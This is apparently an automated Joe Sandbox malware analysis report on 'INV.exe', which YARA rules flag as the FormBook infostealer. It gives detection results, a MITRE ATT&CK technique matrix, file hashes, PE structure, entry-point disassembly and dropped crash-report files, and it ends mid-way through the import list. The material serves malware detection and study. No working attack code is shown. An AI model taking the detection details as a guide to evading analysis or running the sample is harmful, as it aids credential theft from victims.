Source: C:\Users\user\Desktop\INV.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	2_2_0009E9CF
Source: C:\Users\user\Desktop\INV.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	2_2_000966CA
Source: C:\Users\user\Desktop\INV.exe	Code function: EnumSystemLocalesW,	2_2_0009771D
Source: C:\Users\user\Desktop\INV.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	2_2_0009E724
Source: C:\Users\user\Desktop\INV.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,	2_2_0009A73D
Source: C:\Users\user\Desktop\INV.exe	Code function: GetLocaleInfoW,	2_2_000977A3
Source: C:\Users\user\Desktop\INV.exe	Code function: EnumSystemLocalesW,	2_2_0009E3D3

Source: C:\Users\user\Desktop\INV.exe

Code function: 0_2_00092679 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00092679

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.INV.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INV.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INV.exe.90000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.INV.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INV.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INV.exe.90000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	DLL Side-Loading1	Process Injection111	Modify Registry1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Application Shimming1	DLL Side-Loading1	Virtualization/Sandbox Evasion2	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Application Shimming1	Disable or Modify Tools1	Security Account Manager	Security Software Discovery61	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection111	NTDS	Virtualization/Sandbox Evasion2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Process Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information3	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing1	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	DLL Side-Loading1	Proc Filesystem	System Information Discovery32	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
INV.exe	37%	Virustotal		Browse
INV.exe	100%	Avira	ADWARE/MultiPlug.Gen7
INV.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.INV.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.2.INV.exe.90000.0.unpack	100%	Avira	TR/Crypt.EPACK.Gen2	Download File
2.0.INV.exe.90000.0.unpack	100%	Avira	ADWARE/MultiPlug.Gen7	Download File
0.0.INV.exe.90000.0.unpack	100%	Avira	ADWARE/MultiPlug.Gen7	Download File
2.2.INV.exe.90000.0.unpack	100%	Avira	ADWARE/MultiPlug.Gen7	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005	WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier	WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o	WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid	WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200	WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o	WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone	WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone	WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince	WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/	WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20	WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/	WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication	WerFault.exe, 00000005.00000003.653666644.0000000004CE0000.00000004.00000001.sdmp	false	high

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	323458
Start date:	27.11.2020
Start time:	02:12:40
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	INV.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.evad.winEXE@5/4@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 51% (good quality ratio 47.8%) Quality average: 80.9% Quality standard deviation: 29.5%
HCA Information:	Successful, ratio: 58% Number of executed functions: 9 Number of non-executed functions: 64
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, WerFault.exe, wermgr.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.43.193.48, 52.255.188.83, 13.88.21.125, 51.104.139.180, 51.11.168.160, 92.122.213.247, 92.122.213.194, 40.90.23.206, 40.90.23.247, 40.90.23.208, 40.90.137.126, 13.104.215.69, 40.90.137.124, 40.90.23.154, 40.90.137.125, 20.54.26.129, 92.122.145.220, 52.155.217.156 Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, blu-main-ips-v4only.b.lg.prod.aadmsa.trafficmanager.net, a1449.dscg2.akamai.net, arc.msn.com, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus17.cloudapp.net, login.live.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, www.tm.lg.prod.aadmsa.trafficmanager.net

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_INV.exe_7fa5c1fc50c97be82372a0bb1297551a3548ed7_49edae5c_1a096a15\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	11314
Entropy (8bit):	3.7650886089164053
Encrypted:	false
SSDEEP:	96:O8CEsLPcDl+hVkDNfypXIQcQvc6QcEDMcw3Db+HbHgg5uHjgtYsaSiYuka5o1CvY:EEIUZMHBUZMXYjGd/u7sJS274It56b
MD5:	4210E4EFCE813821ABC85A05EC9BB610
SHA1:	9C7923F645EEA0C831209F1C7CC561D9A4E98A37
SHA-256:	5282B268BBFA8CDB2BBA05CBDFAD1461B0B3BCEFF4CEC6B9BE76937439E00078
SHA-512:	2B1BC2DACE8AE82B733B5802BA299E6AB5C3E2665E2B43B97CC9F4F444429AC23C26BCA035AC2DE02EB6FCE4397566F906C0A30E53DC0755DBFD969D4D521842
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.9.1.3.2.0.9.6.8.5.3.1.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.9.1.3.2.1.3.5.4.4.6.7.6.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.6.c.f.0.5.4.5.-.1.6.d.1.-.4.f.e.4.-.9.a.7.8.-.3.2.5.8.c.3.e.4.0.c.d.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.a.7.3.4.8.b.e.-.5.9.3.e.-.4.1.c.9.-.b.b.0.5.-.b.d.c.8.0.a.6.e.2.7.c.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.N.V...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.f.0.-.0.0.0.1.-.0.0.1.b.-.8.c.a.5.-.8.5.8.1.5.a.c.4.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.d.3.5.a.e.9.1.5.c.2.c.9.6.f.c.6.d.3.6.c.e.5.2.8.8.0.2.e.4.b.0.0.0.0.f.f.f.f.!.0.0.0.0.1.8.0.e.8.1.b.a.b.3.4.1.e.d.a.0.d.4.0.4.b.8.f.5.f.e.d.9.3.b.c.3.b.3.5.0.c.f.b.d.!.I.N.V...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER54C8.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Nov 27 01:13:30 2020, 0x1205a4 type
Category:	dropped
Size (bytes):	107650
Entropy (8bit):	3.5546107077695166
Encrypted:	false
SSDEEP:	768:mQMS9C5l3JN1OpTwebzkmRf6mx303oHqUD8CQjMOWQaCgUziU5Sep9qaLa+97h:mld9e/x303oGFBNaCgUziUzpsq7h
MD5:	51279CD356C366D625D183A3DCB83674
SHA1:	931A15B368662F913082F6675C1E5E4F328C4924
SHA-256:	0716B41901C75AD657AE2BC6658506EF633A026CE2C0D547AC8A9218E6FC464A
SHA-512:	260521156C984B18DABFF4F9A993596F431BDA436BB50E987B755868BEE1B5113163E9BE06327D22CDAB3260359656F0F60C80999B5DE340A5C1D14F50CA4EA2
Malicious:	false
Reputation:	low
Preview:	MDMP....... ........R._...................U...........B..............GenuineIntelW...........T............R._.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER597C.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8222
Entropy (8bit):	3.693586025165365
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi8v62X6YZH6tppgmfZ2SN+pr589bWW7wsfGSm:RrlsNiE6A6Yp6tppgmfZ2S/WYfa
MD5:	7FF269553DEC8C3DEAD9D42A93981584
SHA1:	36D14895C4F350E51AA8E7D8ADFB9D9F5B1D6CD1
SHA-256:	FFA7AD16F540827A13964F1FBF690B75D32B6519B24CACE7E73AB264C77691A7
SHA-512:	C6249B20B3821B02487999FF74C631E49547E1548F3498CFF666CE74C08A87BE4EE16150C6ABB3FDFADB738FCEC96C3086D6C10EA10E1C0C096D5BFF1CE5DFA6
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.4.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B13.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4533
Entropy (8bit):	4.453085391753248
Encrypted:	false
SSDEEP:	48:cvIwSD8zs8JgtWI98SWSC8Bq8fm8M4JA+ZFX+q8Hxq7zqvJuBd:uITf6bzSNlJnDII7mv4Bd
MD5:	621C78EE612AFF1724CCA4B31846DCB9
SHA1:	3FC8DE4A557EF3759869FE51F5D9E36BFD6F2679
SHA-256:	C36F1AFCB9B5FA8B1E9CBA499B001AE3352C7242E6D9E3574B4785A218911D08
SHA-512:	C578049B7162B750EFB0BED6451DF9DB3024917A10ABA87616E7B6EA975F7EBA1FDEFCBA6FF86AC8AD4EDBEDFB213430FD22248076A4FAC866CCFBD5229F2A87
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="746544" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General
File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.734539190231703
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	INV.exe
File size:	394240
MD5:	83259cb82642666503278233421c306d
SHA1:	180e81bab341eda0d404b8f5fed93bc3b350cfbd
SHA256:	6e28207e7a3ef7f173d7a7905208a55ff0ad1eb645241e2e9ae453c643cf3a31
SHA512:	c5b2342cdd849a49b4e2472c563301aa3f69d192317901f13dd94db5ad680db7b6e529a6b23fd2528e6378a08f058ee06a9663c8539ce44655235fd241cdc5c7
SSDEEP:	6144:OKRY0sMhL5VwjYGFzVfPn1IqXJ7kELwepHTAXF3QOrIxc8V4rJH:OKBsM1whBPn1IWdkELLpHU1Xrmc8V4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0Y.ecY.ecY.ec...c@.ec...cV.ec...c<.ec.S.cT.ecY.dc3.ecT..cX.ecT..cX.ecY..cX.ecT..cX.ecRichY.ec........................PE..L..

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x40127b
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FC0322D [Thu Nov 26 22:54:37 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	e5251995cfb2fe7a12656fff0fe17665

Entrypoint Preview

Instruction
call 00007FAD40BC234Eh
jmp 00007FAD40BC0D8Ah
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov eax, dword ptr [eax]
cmp dword ptr [eax], E06D7363h
jne 00007FAD40BC0F77h
cmp dword ptr [eax+10h], 03h
jne 00007FAD40BC0F71h
mov eax, dword ptr [eax+14h]
cmp eax, 19930520h
je 00007FAD40BC0F6Dh
cmp eax, 19930521h
je 00007FAD40BC0F66h
cmp eax, 19930522h
je 00007FAD40BC0F5Fh
cmp eax, 01994000h
je 00007FAD40BC0F58h
xor eax, eax
pop ebp
retn 0004h
call 00007FAD40BC26ECh
int3
push 00401285h
call 00007FAD40BC2D3Bh
pop ecx
xor eax, eax
ret
push ebp
mov ebp, esp
push esi
call 00007FAD40BC128Eh
mov esi, eax
test esi, esi
je 00007FAD40BC109Bh
mov edx, dword ptr [esi+5Ch]
mov ecx, edx
push edi
mov edi, dword ptr [ebp+08h]
cmp dword ptr [ecx], edi
je 00007FAD40BC0F5Fh
add ecx, 0Ch
lea eax, dword ptr [edx+00000090h]
cmp ecx, eax
jc 00007FAD40BC0F41h
lea eax, dword ptr [edx+00000090h]
cmp ecx, eax
jnc 00007FAD40BC0F56h
cmp dword ptr [ecx], edi
je 00007FAD40BC0F54h
xor ecx, ecx
test ecx, ecx
je 00007FAD40BC1066h
mov edx, dword ptr [ecx+08h]
test edx, edx
je 00007FAD40BC105Bh
cmp edx, 05h
jne 00007FAD40BC0F5Eh
and dword ptr [ecx+08h], 00000000h
xor eax, eax
inc eax
jmp 00007FAD40BC104Bh
cmp edx, 01h
jne 00007FAD40BC0F5Ah
or eax, FFFFFFFFh
jmp 00007FAD40BC103Eh

Rich Headers

Programming Language:

[RES] VS2013 build 21005
[LNK] VS2013 build 21005

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d124	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x62000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x63000	0x130c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1cc68	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x18000	0x1c0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x16e9f	0x17000	False	0.517747961957	data	6.61669655756	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x18000	0x5bb4	0x5c00	False	0.373259171196	data	4.5684318813	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1e000	0x43b44	0x41e00	False	0.988499911053	DOS executable (block device driver\377\377\200)	7.98533790258	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x62000	0x1e0	0x200	False	0.52734375	data	4.70436301348	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x63000	0x130c	0x1400	False	0.778515625	data	6.50096033347	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x62060	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	EnumCalendarInfoExA, SetCalendarInfoW, VirtualProtect, CloseHandle, WriteConsoleW, SetFilePointerEx, SetStdHandle, GetConsoleMode, GetConsoleCP, FlushFileBuffers, lstrcpyA, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, HeapSize, GetStringTypeW, HeapReAlloc, HeapAlloc, WaitForSingleObjectEx, EnumCalendarInfoW, CreateDirectoryW, EnumSystemLocalesW, GlobalFix, OutputDebugStringW, RtlUnwind, LoadLibraryExW, FreeLibrary, GetCommandLineA, GetLastError, SetLastError, GetCurrentThread, GetCurrentThreadId, EncodePointer, DecodePointer, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, MultiByteToWideChar, WideCharToMultiByte, GetProcessHeap, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameA, WriteFile, GetModuleFileNameW, QueryPerformanceCounter, GetCurrentProcessId, 